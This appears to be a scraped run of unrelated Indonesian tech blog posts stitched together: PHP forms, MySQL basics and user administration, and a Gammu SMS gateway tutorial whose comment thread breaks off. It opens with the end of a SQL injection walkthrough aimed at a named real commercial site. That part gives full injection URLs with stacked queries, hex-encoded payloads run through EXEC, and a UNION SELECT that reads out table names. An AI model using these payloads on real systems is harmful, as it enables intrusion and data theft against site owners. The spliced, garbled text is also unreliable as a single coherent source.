2. Setelah itu kita modifikasi SQL diatas agar hasil dari query diatas bisa masuk kedalam table yang baru kita buat. Oke kita modifikasi



DECLARE @x varchar(8000)

SELECT @x = COALESCE(@x + ', ','') + sysobjects.name FROM sysobjects (NOLOCK) WHERE sysobjects.type = 'U'

INSERT INTO test VALUES (@x)



Lalu kita coba melakukan select pada table test yang sudah kita isi dengan query diatas



SELECT * FROM test



3. Ternyata Query yang kita modifikasi berjalan dengan Sukses, OK kita langsung saja implementasi ke lapangan dengan harapan SQL tersebut tereksekusi dengan baik.. Kita create table terlebih dahulu

http://www.dagangasia.com.my/directory/directoryListing.asp?intID=15;CREATE TABLE test (fieldtest varchar(8000));--

Tidak ada error terjadi, setelah itu kita execute Query selanjutnya

http://www.dagangasia.com.my/directory/directoryListing.asp?intID=15;DECLARE @x varchar(8000) SELECT @x = COALESCE(@x + ', ','') + sysobjects.name FROM sysobjects (NOLOCK) WHERE sysobjects.type = 'U' INSERT INTO test VALUES (@x);--

Tidaaaak… terdapat error, dan setelah saya melakukan trial dan error ternyata disebabkan tanda + pada Query tersebut dianggap “ “ (space) oleh browser, sehingga kita tidak bisa melakukan execute terhadap Query diatas L

4. Kita tidak boleh menyerah, banyak jalan menuju roma, dan yang kita lakukan adalah merubah Query diatas menjadi sekumpulan hexadesimal J Query diatas jika di jadikan hexadecimal kira2 akan seperti ini

0x4445434C41524520407820766172636861722838303030292053454C454354204078203D20434F414C45534 345284078202B20272C20272C272729202B207379736F626A656374732E6E616D652046524F4D207379736F62 6A6563747320284E4F4C4F434B2920494E5345525420494E544F20746573742056414C554553202840782920


Lalu bagaimana kita membuat execute untuk hexadecimal diatas ? saya sudah membuat Querynya mudah mudahan berhasil



DECLARE @a varchar(8000) SET @a = CAST(0x4445434C41524520407820766172636861722838303030292053454C454354204078203D20434F414C45 534345284078202B20272C20272C272729202B207379736F626A656374732E6E616D652046524F4D207379736F6 26A6563747320284E4F4C4F434B2920494E5345525420494E544F20746573742056414C554553202840782920 AS VARCHAR (8000)) EXEC (@a);--

5. Ternyata Query yang kita modifikasi berjalan dengan Sukses, OK kita langsung saja implementasi ke lapangan dengan harapan SQL tersebut tereksekusi dengan baik.. Karena kita telah membuat table test kita tinggal menjalankan Query untuk mengisi table test

http://www.dagangasia.com.my/directory/directoryListing.asp?intID=15;DECLARE @a varchar(8000) SET @a = CAST(0x4445434C41524520407820766172636861722838303030292053454C454354204078203D20434F414C45534345284078 202B20272C20272C272729202B207379736F626A656374732E6E616D652046524F4D207379736F626A6563747320284E4F4C4F4 34B2920494E5345525420494E544F20746573742056414C554553202840782920 AS VARCHAR (8000)) EXEC (@a);--

Dan tidak ada error, hore hore hore…. Akhirnya bisa juga di execute querynya... oops apakah bener Query tersebut sukses di execute ?

6. Sebagai penutup dari trik ini saya akan melakukan SELECT dari table test yang telah kita buat diatas

http://www.dagangasia.com.my/directory/directorydetail.asp?intID=0 UNION SELECT fieldtest,‘2’,'3','4','5','6','7','8','9' FROM test ;--&t=1





Kesimpulan

Bener bener deh, jika kita tidak mudah menyerah dan mau sedikit berimprovisasi kita akan mendapatkan segala sesuatu yang kita inginkan :) Terima Kasih telah meluangkan waktu untuk membaca artikel yang panjang dan cupu ini.. Jika ada kesalahan kata maupun ada teknik yang lebih keren... Mohon artikel ini diperbaiki..... Thanks to semuanya yang sudah membantu baik dukungan moril maupun materiil ... Viva Indonesia...

NB : Artikel ini adalah pembelajaran bukan tutorial untuk melakukan hacking terhadap sebuah situs, kalo ada penyalahgunaan terhadap artikel ini saya (new-bee) tidak bertanggung jawab. Terima kasih.

Metode Post dan Get PHP

Metode Post dan Get PHP


Dalam
mengembangkan sebuah aplikasi web, seorang developer dihadapkan kepada
beberapa opsi dalam melakukan update, insert, dan delete record
database. Dan itu semua diawali pada penggunaan form dengan berbagai
action dan method. Begitupun halnya pada implementasi ketika user
memasukkan data ke dalam form inputan. Yang kemudian dilanjutkan kepada
proses pengolahan dimana setelahnya hasil dari olahan tersebut
dimasukkan kedalam database. Nah disinilah pemilihan fungsi method
dibutuhkan. Method ini terbagi menjadi 2, yakni POST dan GET, masing
masing memiliki perbedaan yang tipis. Sederhananya method ini bekerja
ketika si user menekan tombol submit dengan action yang telah disetting
sebelumnya. ( kalo pusing baca lagi dari awal. :D~~ ) Dalam
implementasi contoh kasusnya seperti ini, buat satu file html bernama index.html :


Isi Buku tamu








Nama :
Email :
Homepage :
Isi :





Dan get.php :


echo $_GET['nama']."
".$_GET['email']."
".$_GET['isi']

?>


Perhatikan
url pada browser internet anda, terlihat url yang super panjang, ini
terjadi akibat dari variable yang dihasilkan oleh form inputan kembali
ditampilkan beserta isinya. Hal ini jelas memiliki dampak kelemahan
karena umumnya browser hanya dapat memperlihatkan dan mengambil nilai
sebanyak 256 karakter dari address bar. Dan tentunya hal ini akan
berpengaruh kepada data yang akan diolah dan di simpan kedalam database
nantinya.
Ditampilkannya hasil dari form inputan berguna sekali
jika diimplementasikan pada pembuatan fasilitas searching. Namun hal
ini menjadi kendala jika method get ini digunakan dalam menginput data
dengan text yang panjang. Dari sinilah permasalahan seperti ini
ditangani oleh method post. Tapi sebelumnya, buat sebuah file bernama index2.html :


Isi Buku tamu








Nama :
Email :
Homepage :
Isi :





Dan satu lagi halaman post.php berisi :


echo $_POST['nama']."
".$_POST['email']."
".$_POST['homepage']."
".$_POST['isi'];

?>


Jika
user memasukkan data melalui form input yang ada di index2.html, maka
hasil yang dikirimkan dengan method post tidak akan ditampilkan di
address bar, namun tetap tersimpan dalam memory, untuk mengambilnya
cukup dengan menggunakan variable $_POST[‘variable’], hal ini tentunya
dapat mencegah url yang terlihat kotor, berantakan, dan penuh dengan
noda-noda. :D. Yups, sepertinya cukup jelas.
Sekian dan terima kasih. :D~

Script-nya dapat anda download disini
http://networkandgame.890m.com/ilmuwebsite/lab.zip

Greetz : b_scorpio  berjuang tuk menguasai jagat raya. :D~,
phii_ yang dah kerja :D makan makannya kapan ?,
safril yang nunggu zine keluaran ilmuwebsite.

Dasar Dasar MySQL

Dasar Dasar MySQL

Untuk belajar MySQL, anda mesti mengetahui dasar-dasar dari MySQL itu sendiri...\ Dalam bahasa SQL pada umumnya informasi tersimpan dalam tabel-tabel yang secara logik merupakan struktur dua dimensi terdiri dari baris (row atau record) dan kolom(column atau field). Sedangkan dalam sebuah database dapat terdiri dari beberapa table. Beberapa tipe data dalam MySQL yang sering dipakai: Tipe data Keterangan INT(M) [UNSIGNED] Angka -2147483648 s/d 2147483647 FLOAT(M,D) Angka pecahan DATE Tanggal Format : YYYY-MM-DD DATETIME Tanggal dan Waktu Format : YYYY-MM-DD HH:MM:SS CHAR(M) String dengan panjang tetap sesuai dengan yang ditentukan. Panjangnya 1-255 karakter VARCHAR(M) String dengan panjang yang berubah-ubah sesuai dengan yang disimpan saat itu. Panjangnya 1 – 255 karakter BLOB Teks dengan panjang maksimum 65535 karakter LONGBLOB Teks dengan panjang maksimum 4294967295 karakter MEMBUAT DATABASE DAN TABLE Untuk masuk ke dalam program MySQL pada prompt jalankan perintah berikut ini: C:\> MYSQL (Enter) Cara untuk membuat sebuah database baru adalah dengan perintah: create database namadatabase; Contoh: create database privatdb; Untuk membuka sebuah database dapat menggunakan perintah berikut ini: use namadatabase; Contoh: use privatdb; Perintah untuk membuat tabel baru adalah: create table namatabel ( struktur ); Contoh: Misalkan kita ingin menyimpan data anggota yaitu: nomor, nama, email, alamat, kota. Sedangkan strukturnya seperti tabel dibawah ini: Kolom/Field Tipe data Keterangan nomor int(6) not null primary key angka dengan panjang maksimal 6, sebagai primarykey, tidak boleh kosong nama char(40) not null teks dengan panjang maksimal 40 karakter, tidak boleh kosong email char(255) not null teks dengan panjang maksimal 255 karakter, tidak boleh kosong alamat char(80) not null teks dengan panjang maksimal 80 karakter, tidak boleh kosong kota char(20) not null teks dengan panjang maksimal 20 karakter, tidakboleh kosong Perintah MySQL untuk membuat tabel seperti diatas adalah: create table anggota( nomor int(6) not null primary key, nama char(40) not null, email char(255) not null, alamat char(80) not null, kota char(20) not null ); Sedangkan data yang akan diisikan dalam tabel anggota adalah sebagai berikut: Nomor Nama E-Mail Alamat Kota 1 Arini Nurillahi arini@hotmail.com Jl. Lebak Rejo 7 Surabaya 2 Renny Herlina rennyherlina@yahoo.com Jl. Hayam Wuruk 81 Bau Bau 3 Anon Kuncoro anonkuncoro@yahoo.com Jl. Candi Permata II/182 Semarang 4 Bayu bayu@astaga.com Jl. Pemuda 19 Surabaya 5 Riza riza@themail.com Jl. Karang Menjangan 5 Surabaya 6 Paul paul@rocketmail.com Jl. Metojoyo A-10 Malang 7 Anita anita@netscape.net Jl. Teuku Umar 45 Malang 8 Yusuf yusuf@hotmail.com Jl. Rajawali 78 Mojokerto 9 Ali ali77@astaga.com Jl. Hasanuddin 3 Mojokerto 10 Aji ajisaka77@yahoo.com Jl. Kalilom Lor Kelinci 9 Surabaya 11 Latief latif@mail.com Jl. Merak 171 Surabaya 12 Supri supri@themail.com Jl. Sudirman 12 Malang Untuk memasukkan sebuah baris (record) kedalam tabel MySQL adalah sebagai berikut: insert into namatabel values(kolom1, kolom2, kolom3,…); Contoh: insert into anggota values(‘1’,’Arini Nurillahi’,’arini@hotmail.com’,’Jl.Lebak Rejo 7’,’Surabaya’); MENAMPILKAN ISI TABLE Isi tabel dapat ditampilkan dengan menggunakan perintah SELECT, cara penulisan perintah SELECT adalah: select kolom from namatable; Contoh: • Untuk menampilkan kolom (field) nomor dan nama pada tabel anggota select nomor, nama from anggota; • Untuk menampilkan semua kolom(field) pada tabel anggota select * from anggota; • Untuk menampilkan semua kolom pada tabel anggota yang berada pada kota ‘Surabaya’ select * from anggota where kota=’Surabaya’; • Untuk menampilkan semua kolom pada tabel anggota dengan urut nama select * from anggota order by nama; • Untuk menghitung jumlah record pada tabel anggota select count(*) from anggota; • Untuk menampilkan kota pada tabel anggota select kota from anggota; • Untuk menampilkan kota dengan tidak menampikan kota yang sama pada tabel anggota select distinct kota from anggota; • Untuk menampilkan nama dan email yang mempunyai email di ‘yahoo.com’ select nama,email from anggota where email like ‘%yahoo.com’; MENGHAPUS RECORD Untuk menghapus suatu record dengan kriteria tertentu digunakan perintah sebagai berikut: delete from namatabel where kriteria; Contoh: • Menghapus record dari tabel anggota yang bernomor ‘3’ delete from anggota where nomor=’3’; MEMODIFIKASI RECORD Untuk memodifikasi (merubah) isi record tertentu adalah dengan menggunakan perintah sebagai berikut: update namatabel set kolom1=nilaibaru1, kolom2=nilaibaru2 … where kriteria; Contoh: • Merubah e-mail dari anggota yang bernomor 12 menjadi ‘supri@yahoo.com’ dalam tabel anggota. update anggota set email=’supri@yahoo.com’ where nomor=’12’; MENGHUBUNGKAN PHP DENGAN MySQL Agar script PHP yang kita buat dapat berhubungan dengan database dari MySQL dapat menggunakan fungsi berikut ini: File utama.php: Isi dari variabel $host, $username, $password dan $databasename dapat disesuaikan sesuai dengan setting pada MySQL server yang ada. Contoh: Menampilkan data anggota yang telah dibuat dengan menggunakan script PHP. File contoh13.php: nomor; $nama=$row->nama; $email=$row->email; $alamat=$row->alamat; $kota=$row->kota; // ------ menampilkan di layar browser echo("$nomor | $nama | $email | $alamat | $kota |"); } ?>

Dasar MySQL dan Administrasi User

Dasar MySQL dan Administrasi User

Mengenal MySQL
Apa itu MySQL?

MySQL adalah salah satu jenis database server yang sangat terkenal.
MySQL menggunakan SQL sebagai bahasa dasar untuk mengakses databasenya.
Selain itu, MySQL bersifat free (Anda tidak perlu membayar untuk menggunakannya) pada pelbagai platform (kecuali pada Windows, yang bersifat shareware)
MySQL termasuk jenis RDBMS (Relational Database Management System). Itulah sebabnya, istilah seperti tabel, baris, dan kolom digunakan pada MySQL. Pada MySQL, sebuah database mengandung satu atau sejumlah tabel. Tabel terdiri atas sejumlah baris dan setiap baris mengandung satu atau beberapa kolom.
Mengatur Password Root
root adalah pemakai dengan level tertinggi pada MySQL yang bisa melakukan apa saja terhadap database MySQL.
Pemberian password dapat Anda lakukan dengan memberikan perintah sebagai berikut:

mysqladmin -uroot password gandhi —-> perintah ini berarti kita mengeset password root dengan password “gandhi”.

Setelah perintah di atas Anda berikan, untuk menjadi root Anda perlu mengetikkan password berupa kata gandhi.

NB :

Jika kita telah memberikan password seperti di atas dan kemudian kita ingin mengganti password root menjadi “rahasia”, maka lakukan perintah seperti berikut:

mysqladmin -uroot -p password rahasia

Yang perlu diperhatikan adanya tambahan -p. Kita akan segera menjumpai tanggapan sebagai berikut:

Enter password:

Ketikkan password semula dan tekan Enter. Selanjutnya, password untuk root sudah berubah menjadi rahasia.

Menjalankan Program Klien mysql


mysql adalah nama program pada klien untuk mengakses database MySQL
Untuk menjalankankannya, berikan perintah berikut pada prompt shell:

mysql -uroot -p

Saat muncul Enter password:

masukkan password dan tekan Enter. Anda akan menjumpai prompt:

mysql>

Langkah selanjutnya, kita bisa segera memberikan perintah-perintah mysql untuk memanipulasi database menggunakan MySQL.

Melihat Daftar Database
Untuk mengetahui nama-nama database yang terdapat pada MySQL, kita bisa menggunakan perintah SHOW DATABASES pada prompt mysql.
Sebagai contoh, ketikkan perintah berikut dan kemudian tekan Enter:

SHOW DATABASES;

Program mysql akan menginformasikan keberadaan dua buah database yaitu mysql dan test. Misal jika kita sudah memiliki database yang bernama buku, maka jika kita mengetikkan perintah SHOW DATABASES; maka database buku juga akan tampil.

Melakukan Koneksi ke Suatu Database
Kalau kita bermaksud melakukan pemanipulasian ke suatu database, kita perlu melakukan koneksi ke database tersebut terlebih dulu. Hal ini bisa dilakukan dengan menggunakan perintah mysql bernama USE.
Contoh:

USE user;

Anda akan mendapatkan tanggapan berupa :

Database changed

Mengetahui Nama-nama Tabel
Sebuah database dapat mengandung sejumlah tabel.
Untuk mengetahui tabel-tabel yang terdapat pada suatu database, kita bisa menggunakan perintah SHOW TABLES
Contoh :

SHOW TABLES;

Hasilnya semua tabel pada database tsb ditampilkan.

Mengetahui Struktur Tabel
Bila kita bermaksud mengetahui struktur suatu tabel, kita bisa menggunakan perintah DESCRIBE atau DESC.
Contoh untuk mengetahui struktur tabel bernama pajak :

DESC pajak;

Kita akan menjumpai hasil semacam berikut.

desc.gif

Keluar dari mysql

Salah satu perintah untuk keluar dari mysql:

exit
quit
\q

Melihat Isi Tabel user
Perintah untuk melihat tabel bernama pajak (setelah Anda mengaktifkan database):

SELECT * FROM user; —> jangan lupa akhiri perintah dengan titik koma “;”

Select * artinya kita menampilkan semua field. Dengan kata lain tanda “*” berarti semua. Anda akan menjumpai hasil semacam berikut.

user.gif

Pada tabel user, nilai % atau kosong pada kolom host berarti sembarang host adapun localhost berarti dari lokal tempat MySQL berada. Pada contoh di atas, pemakai bernama root dapat megakses dari localhost dengan disertai password, tetapi jika ia mengakses dari bukan localhost maka ia bisa mengakses database tanpa password. Sedangkan pemakai siapa saja selain root dapat mengakses dari mana saja tanpa password. Untuk alasan keamanan, tentu saja keadaan seperti perlu diubah. Cara mengubahnya dapat dilihat pada pembahasan berikut.

Menghapus Pemakai
Mungkin Anda bertanya-tanya, ketika Anda menjalankan mysql Anda sebenarnya berlaku sebagai pemakai siapa? Sesungguhnya apapun nama pemakai Anda Anda bisa mengakses mysql. Pertanyaan berikutnya yang mungkin timbul, “Mengapa bisa begitu?”. Jawabannya disebabkan pada tabel user terdapat pemakai dengan nama kosong, yang memungkinkan siapa saja bisa menjalankan mysql.
Sekarang, Anda dapat mencoba apa yang terjadi seandainya pemakai dengan nama kosong dihapus. Untuk melakukan penghapusan baris yang ada pada tabel, Anda bisa menggunakan perintah SQL bernama DELETE. Sebagai contoh, ketikkan perintah berikut dan kemudian tekan Enter:

DELETE FROM user WHERE user =” ”;

Perintah di atas digunakan untuk menghapus baris-baris pada tabel user yang memenuhi kondisi yakni kolom user berisi string kosong.

Anda bisa memberikan perintah berikut untuk melihat isi tabel user sekarang:

SELECT * FROM user;

Supaya perubahan yang baru saja Anda lakukan berpengaruh terhadap program mysql, Anda perlu memberikan perintah berikut:

flush privileges;

Perintah di atas digunakan agar informasi tentang privilege (hak akses terhadap database) dimuat kembali, sehingga perubahan akan berpengaruh pada tahap selanjutnya.
Sekarang, cobalah untuk keluar dari mysql dan kemudian jalankan mysql kembali dengan mengetikkan:

mysql

Apa yang terjadi? Anda akan menjumpai pesan kesalahan yang menyatakan Anda tak dapat mengakses mysql.

Mengakses mysql Melalui root
Begitu Anda menjumpai pesan seperti di depan, Anda barangkali bertanya-tanya, “Lalu bagaimana saya bisa menggunakan mysql?”. Jawabannya, Anda perlu menggunakan pemakai root atau melalui pemakai yang khusus dibuat untuk mengakses mysql.

Membuat Pemakai Baru
Pembuatan dilakukan dengan menggunakan perintah SQL bernama INSERT melalui root. Sebagai contoh, praktekkan perintah berikut:

INSERT INTO user (host, user, password)
VALUES (’localhost’, ‘php’, password(’gandhi));

Setelah Anda memberikan perintah di atas, berikan perintah:

flush privileges;

dan kemudian keluarlah dari mysql.
Selanjutnya ujilah pemakai yang baru Anda ciptakan dengan memberikan perintah berikut:

mysql -uphp -p

Perintah di atas digunakan untuk menjalankan program mysql dari pemakai bernama php. Ketikkan password gandhi ketika mysql memberikan tanggapan:

Enter password:

Anda akan segera menjumpai prompt mysql. Lalu, cobalah untuk memberikan perintah:

USE mysql;

Apa yang terjadi? Ternyata pemakai php tidak berhak mengakses database mysql. Mengapa begitu? Jawabannya adalah karena ketika Anda menciptakan pemakai php, Anda tidak mengatur wewenangnya. Pada keadaan ini semua pengaksesan terhadap database tidak diperkenankan.

Mengganti Wewenang untuk Pemakai php
Dengan menggunakan pemakai root, Anda bisa segera mengubah wewenang untuk pemakai php agar ia bisa melakukan koneksi ke suatu database dan juga melakukan pengaksesan terhadap tabel. Hal ini dapat dilakukan dengan menggunakan perintah SQL bernama UPDATE.
Untuk mempraktekkannya, jalankan mysql dengan memberikan perintah berikut terlebih dulu:

mysql -uroot -p

Setelah prompt mysql ditampilkan, berikan perintah:

USE mysql;

Selanjutnya berikan perintah berikut:

UPDATE user
SET select_priv = ‘Y’,
insert_priv = ‘Y’,
update_priv = ‘Y’,
delete_priv = ‘Y’,
create_priv = ‘Y’,
drop_priv = ‘Y’
WHERE user = ‘php’;

Perintah di atas digunakan untuk mengubah isi sejumlah kolom pada tabel user khusus untuk baris yang nilai user-nya berupa php. Perintah di atas digunakan agar pemakai php dapat melakukan operasi SELECT, UPDATE, DELETE terhadap tabel dan menciptakan (CREATE) dan menghapus (DROP) tabel.
Setelah Anda memberikan perintah di atas, berikan perintah:

flush privileges;

Selanjutnya dengan menggunakan pemakai php, Anda bisa mencoba perintah seperti use dan select.

Sampai di sini dulu pembahasan kita kali ini…Udah keburu laper ni…Mau makan siang… :)



~ oleh gandhiprima di/pada 8 Januari, 2008.

Ditulis dalam Programming
5 Tanggapan to “Dasar MySQL dan Administrasi User”

1.

tanks untuk ilmunya, and tlg kasih tahu lagi donk tentang seputar database berbasis web biarin yang jadul2 juga yang penting bisa nambah2 ilmu.

Tanks benget

Admin Says : Secepatnya. Terima kasih atas kunjungannya

rahmat dibahas juga di dalam 12 Mei, 2008 pada 4:45 am
2.

bos tolong dikasih tau cara mencari duplikasi/field ganda dlm msql donk?? misal mencari noktp yang sama dlm tabel kartu keluarga, tqq

Admin Says : sudah saya balas ke email anda.

bastian dibahas juga di dalam 14 Mei, 2008 pada 8:05 am
3.

hmm… kalo tools untuk akses mysql apa aja ya selain phpmyadmin???

Rendy dibahas juga di dalam 4 Juni, 2008 pada 12:54 pm
4.

terima kasih mas, artikelnya sangat menolong… :)

riski dibahas juga di dalam 9 Oktober, 2008 pada 4:04 pm
5.

Dapat tidak pkl di tempat saudara ?

Admin Says : Wah, saya bingung jadinya. PKL?? saya ndak punya perusahaan lho mas.. hehehe :)

Wawan Kurniawan dibahas juga di dalam 27 Oktober, 2008 pada 1:45 pm

Newer Comments »
Tinggalkan Balasan
Click here to cancel reply.


* Nama


* Surat (Pribadi)


Situs web


Januari 2008 S S R K J S M
« Des Feb »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31
Halaman

* Cd Tutorial Hacking
* Contact Person
* Distro Linux
* Mac Shop
* Repository Linux
* Tentang Penulis

a
Arsip

* Desember 2008
* November 2008
* Oktober 2008
* September 2008
* Agustus 2008
* Juli 2008
* Juni 2008
* Mei 2008
* April 2008
* Maret 2008
* Februari 2008
* Januari 2008
* Desember 2007
* November 2007

Komentar Terakhir
Don di Cara Menjadi Seorang Hack…
Don di Cara Menjadi Seorang Hack…
Don di Cara Menjadi Seorang Hack…
Don di Cara Menjadi Seorang Hack…
sn1ff3r di Cd Tutorial Hacking
Tulisan Terakhir

* Mohon Maaf untuk customer JualanLinux.com
* Download PCMAV 1.9 Build 2
* Repo Ubuntu 8.10 Sudah Tersedia!
* Download PCMAV 1.8
* Intrepid Release Party !!! FREE!!!

Blogroll

* Get Everything Paid Nothing
* Helloween-Jack
* idhaclassroom
* ilmukomputer.com
* JualanLinux.com
* linux.or.id
* sinau-bareng
* SMK TELKOM PWT
* tikus listrik
* Ubuntu Semarang

Top Posts

* Cara Menjadi Seorang Hacker
* Install MacOs Leopard di Pc/Laptop
* Manajemen File Windows vs Linux
* Tips merakit PC
* Cara nanganin badsector pada harddisk
* File Converter Office 2007
* Cari serial number dengan Serial2K
* Membuat Sendiri Antenna Wireless Internet 2.4GHz
* Meningkatkan kualitas suara Winamp dengan DFX Plugin
* Upgrade Dopod 818Pro (prophet) ke WM6

Meta

* Masuk log
* RSS Entri
* RSS Komentar
* WordPress.com

Blog Stats

* 55,080 Viewers

Spam!!!
69 komentar spam
diblokir oleh
Akismet
Tag
88300 107422 Distro Download Hackintosh Linux OSX86 PDA Tips n Triks


Get a free blog at WordPress.com. Theme: ChaoticSoul by Bryan Veloso.

Web-SMS application with Gammu (Part.1)

Web-SMS application with Gammu (Part.1)

Pengin bagi-bagi ilmu nih. Ini yang perdana sapa tahu berguna buat anda. Share edition kali ini mau bagi² ilmu bagaimana caranya bikin web sms application yaitu sebuah aplikasi yang bisa kirim dan terima sms dan berbasis web. Aplikasi ini menggunakan library sms gateway namanya gammu. Mungkin anda pernah denger tapi belum pernah mengaplikasikannya. Nah mungkin ini bermanfaat buat anda. Kalo ada yang lebih advance boleh nih bagi² ilmunya disini.

Yang pertama kali adalah persiapkan sebuah perangkat PC atau notebook (-terserah) dengan mengikuti requirement sbb :

* Windows XP
* Apache, PHP, MySQL (boleh pake Xampp atau Wamp. Kalo bisa mysqlnya yang versi 5.0.2 ke atas).
* Modem GSM versi AT / handphone (bisa kayak Sony Ericsson, motorolla, dsb.) - link : support ponsel gammu
* Kabeldata untuk modem (asumsi: sudah plus installer driver modem GSM juga yak.)
* SIMcard untuk modem (operator apa saja, mentari kek, simpati, jgn CDMA yak nggak nyambung soalnya :D).

Nah kalo udah semua yang di atas sudah di siapin. download dulu source Gammu librari di sini

Sudah di download?, kalo sudah silahkan extract file yang telah anda download dan letakkan di direktori C:/win32/. Ok kita tinggal dulu file extract tadi. Kita pasang dulu semua perlengkapan pendukung. Modem GSM telah terpasang dan telah di install dengan driver bawaan modem tersebut.

Cek di port berapa modem GSM anda terinstall pada komputer anda. Caranya adalah membuka file explorer windows. Lalu klik kanan pada “mycomputer”. Lalu pilih properties. Pilih tab “hardware”, lalu klik tombol “Device Manager”. klik kanan pada device “modem” yang telah terinstall. Lalu pilih properties untuk melihat portnya.

Sudah tahu dimana port modem GSM terinstall? kalo sudah, sekarang kita buka direktori C:/win32/. Lalu edit file gammurc di wordpad. Ubah bagian port dengan mengetikan port dimana modem anda terinstall. Misal “port2″. Lalu ubah bagian Connection. Dibagian ini anda bisa mengisi sesuai type koneksi modem anda. Untuk melihat type koneksi silahkan ke sini . Misalkan anda memiliki type modem GSM Sony ericsson, Samsung, Alcatel yang type koneksinya adalah AT. maka ketikan “at115200″ pada bagian connection.

gammurc

Setelah itu, kita aktifkan apache dan mysql kita. Buka xampp dan activate!. Jalankan PHPMyAdmin di browser setelah itu buat database dengan nama “smsd”. sudah? lalu dump/import file mysql.sql yang terdapat di dalam directori win32 ke database “smsd” yang sebelumnya telah anda buat. Apabila berhasil maka anda akan memiliki database smsd dengan beberapa tabel seperti “inbox”, “outbox”,”sentitems”, dsb.

Setelah itu, kita menuju ke direktori win32 lagi. Edit file smsdrc di wordpad. Ubah host, username dan password database sesuai dengan settingan database anda.

smsdrc

Sampai sini anda telah melakukan 80% persiapan untuk membangun web sms.

Buka konsol command prompt windows anda (cmd.exe) . Untuk mengecek atau mengidentifikasi modem GSM anda. Caranya adalah melalui konsol, masuklah ke directori C:/win32/ , lalu ketikan “gammu –identify”.

apabila settingan file gammurc anda sukses, maka konsol akan menampilkan informasi mengenai modem GSM anda. berupa nomor IMEI dsb. Jika tidak sukses maka cek kembali settingan port pada gammurc. mungkin settingan port anda masih salah.

Jika sukses, maka kita lanjut untuk mengaktifkan gammu sms gateway server. Dengan mengetikan

“gammu —smsd MYSQL smsdrc” . {pada –smsd itu double dash (- -), jangan sampe salah yak!!}

Apabila sukses maka konsol akan menjalankan server gammu. Jangan tutup konsol ini, biarkan berjalan di background.

Coba cek database smsd dan browse tabel inbox. Jika berhasil connect ke modem, maka tabel inbox akan berisi sms-sms yang ada pada modem GSM anda.

Nah, sampe sini database anda sudah berhasil menerima sms dari modem. Tampilkan tabel “inbox” ini dengan PHP. Dan jalankan dengan browser. Anda sudah bisa mengakses “SMS masuk” dari browser anda. :D selamat!

Nah sekarang bagaimana caranya mengirimkan SMS dengan WEB ?, caranya buatlah sebuah form input dengan PHP untuk melakukan insert data kedalam tabel outbox. harap perhatikan ini, Sejatinya, untuk melakukan pengiriman SMS pada gammu server adalah dengan cara meng”insert” record ke dalam tabel “outbox”. Jangan lupa pesan text anda harus terinsert ke dalam field “textDecoded” dan nomor tujuan anda insert ke field “DestinationNumber”.

Coba lakukan pengiriman SMS dengan nomor tujuan nomor Modem GSM anda sendiri. Sampai disini anda telah berhasil membuat sebuah aplikasi menerima dan mengirim SMS dengan Gammu. Buatlah halaman web dan jalankan dibrowser dengan hanya mengakses database “smsd” tadi.

Jangan lupa ya, untuk mengetest pengiriman modem GSM anda harus “pulsa ready” , kalo nggak bagaimana anda bisa melakukan pengiriman SMS. (”ya iyyaa laah…”). :D.

Ok, semoga bermanfaat yaa.. untuk bagian 2. Saya akan berikan tutorial bagaimana caranya untuk membuat sms autoreply dengan gammu. Wah pokoknya tambah canggih nanti web smsnya.

o iyaa nggak lupa, tulisan ini diambil dari berbagai sumber . tetep naro daftarnya nih di bawah..

1. gammu
2. tutorial ilmukomputer.com
3. sang developer

dah yaa…mudah2an berguna, kalo ada yang salah itu dari saya sendiri. mohon di maapin.

Bertanya lebih jauh?? Ke forum gammu nya freaksides aja disini > http://www.freaksides.com/forum
Tags: Application, Gammu, MySQL, PHP, SMS, web

This entry was posted on Thursday, February 21st, 2008 at 7:00 pm and is filed under Share. You can follow any responses to this entry through the comments feed. You can leave a response, or trackback from your own site.

Tags: Application, Gammu, MySQL, PHP, SMS, web

Posted in Share
50 Responses to “Web-SMS application with Gammu (Part.1)”

ota March 17th, 2008 at 9:23 pm

slm kenal…saya mau tanya gmna cara buat auto responnya ya…tapi datanya dari tabel lain dengan perintah yang kita tentukan..

miftahsteven March 18th, 2008 at 11:22 am

kalo boleh saya sarankan, gunakan database trigger di mysql 5.0.2 keatas atau di postgres.
Buatlah sebuah trigger spt ini misalnya:

delimiter //
CREATE TRIGGER autoreply_gammu AFTER INSERT ON inbox
FOR EACH ROW BEGIN
INSERT INTO outbox SET TextDecoded = ‘‘;
END;
//

Kalo mau ambil data terakhir yang masuk ke field textdecoded tinggal pake “NEW.TextDecoded”. Misalnya kita punya format SMS tertentu sehingga di haruskan ada pengecekan ke tabel field TextDecoded Tabel outbox. Tinggal gunakan

INSERT INTO outbox SET TextDecoded = substring(NEW.TextDecoded, 0,2) /*misalnya*/

Atau tambahkan perintah SELECT ke tabel lain, jika data yang ingin di kirimkan dari tabel lain… misal:

INSERT INTO outbox SET TextDecode = (SELECT field FROM tabel_lain WHERE key = SUBSTRING(NEW.TextDecoded,0,2)) /*contoh lain*/….

dan masih banya lagi cara dengan trigger. pinter2 kita untuk ngedisain trigger di db.

Semoga membantu… thnx

ota March 19th, 2008 at 9:44 pm

kemarin udah ta coba pakai trigger tapi saya masih kesulitan di perintah insertnya itu..no tujuan sudah bisa masuk tapi untuk akses daritabel lain ko ga muncul ya…?saya pake script anda yang di part 2
DELIMITER //
CREATE TRIGGER infonilai AFTER INSERT ON inbox
FOR EACH ROW BEGIN
insert into outbox values (”,”,”,”,NEW.SenderNumber,’Default_No_Compression’,”,
‘-1′,(SELECT nilai_value FROM nilai_mahasiswa
WHERE nilai_type=SUBSTRING(NEW.TextDecoded,6,4) AND
student_id=SUBSTRING(NEW.TextDecoded,11)), ”,’false’,'-1′,”,”,”,”);
END;
//DELIMITER ;
jadi perintah SELECT nilai_value FROM nilai_mahasiswa
WHERE nilai_type=SUBSTRING(NEW.TextDecoded,6,4) AND
student_id=SUBSTRING(NEW.TextDecoded,11)
tidak dapat muncul di outboxnya.dan saya juga bingung maksud angaka 6,4 yang terdapat pada:(NEW.TextDecoded,6,4)dan 11 pada(NEW.TextDecoded,11)
perintah yang saya inginkan seperti ini mas
nilai#student_id#nama
sehingga hasil data yang ingin dikirimkan seperti ini misal:
(nilai anda adalah 90 saudara ota)
mohon bantuannya untuk TA terimakasih sebelumnya…

miftahsteven March 20th, 2008 at 2:43 pm

ok saya akan jelaskan lagi!.
maaf pada jawaban comment kemarin saya teledor bikin script di bagian
